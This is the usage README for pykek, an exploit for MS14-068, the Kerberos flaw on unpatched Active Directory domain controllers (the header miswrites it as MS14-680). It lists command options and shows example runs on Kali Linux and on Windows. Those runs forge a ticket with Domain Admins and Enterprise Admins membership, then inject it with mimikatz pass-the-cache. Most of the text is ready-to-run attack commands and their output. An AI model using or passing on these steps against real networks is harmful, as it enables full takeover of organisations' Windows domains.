https://github.com/bidord/pykek
ms14-068.py
Exploits MS14-680 vulnerability on an un-patched domain controler of
an Active Directory domain to get a Kerberos ticket for an existing
domain user account with the privileges of the following domain groups :
Domain Users (513)
Domain Admins (512)
Schema Admins (518)
Enterprise Admins (519)
Group Policy Creator Owners (520)
USAGE:
ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>
OPTIONS:
-p <clearPassword>
--rc4 <ntlmHash>
Example usage :
Linux (tested with samba and MIT Kerberos)
root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc
-s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
Password:
[+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!
root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0
On Windows
python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`
http://zone.wooyun.org/content/17102